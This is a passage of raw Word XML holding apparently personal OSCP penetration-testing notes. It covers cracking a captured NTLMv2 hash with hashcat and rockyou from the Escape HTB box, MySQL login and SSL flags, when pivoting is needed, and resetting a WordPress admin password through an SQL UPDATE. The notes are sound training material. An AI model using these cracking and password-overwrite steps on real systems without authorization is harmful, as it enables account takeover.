      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="980"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the case of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escape HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we got the user account sql_svc, and the NTLMv2 hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="980"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1130300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="563" name="image558.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image558.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52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19BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="980"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You want to copy and paste the ENTIRE NTLM hash, all the way from "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_apache</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" all the way to the end of the hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="980"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hashcat expects that format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="980"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from a different box, so the username doesn't match up with sql_svc, but you get the point. Just make sure to copy the ENTIRE THING</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019BE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p3csxpe9y46v" w:id="208"/>
      <w:bookmarkEnd w:id="208"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to crack the NTLMv2 hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019BF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Taught in-depth in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 15.3.3. Cracking Net-NTLMv2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use hash cat and the rockyou.txt wordlist. It might autodetect the NTLMv2, but if not, you can specify using the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-m 5600</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019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C4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jtzzd1oev67s" w:id="209"/>
      <w:bookmarkEnd w:id="209"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mysql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019C6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId523">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mysql cheatsheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019C8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to log into MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1137"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql -h &lt;IP&gt; -u [username] -p </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1137"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The p flag tells them that it's asking for a password. Don't put an argument for it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1137"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql -h &lt;IP&gt; -u [username]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1137"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to use no passwords, don't include the -p flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1137"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Secura Challenge Labs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, I accidentally used two spaces instead of one between the flags, and it didn't work. So make sure only to use one space!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019CE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever get this error: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="422"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then just add this flag:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="422"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--skip-ssl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="422"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--ssl=off</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="422"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Like</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mysql -h 192.168.165.88 --skip-ssl -u root -p </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="422"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Like</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mysql -h 127.0.0.1 --ssl=off -u root -p </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fvil5nfgi7es" w:id="210"/>
      <w:bookmarkEnd w:id="210"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to tell if you need to pivot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Secura </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Challenge Labs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you get an error message like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019DB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host '192.168.45.232' is not allowed to connect to this MariaDB server</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or something like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR 1130 (HY000): Host 'WK01' is not allowed to connect to this MariaDB server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Challenge Labs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then that means you likely have to access mysql by pivoting to that machine and then accessing it via localhost</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9tgjna1lnkl7" w:id="211"/>
      <w:bookmarkEnd w:id="211"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to reset passwords in MySQL table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId524">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SunsetMidnight</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we had a MySQL database called wordpress_db. Inside this database was a table called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wp_users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this table was the admin user, but it's MD5 hash was uncrackable, so we just reset the password to something we know</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019E8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1841500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="188" name="image188.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image188.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52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9E9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UPDATE wp_users SET user_pass = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
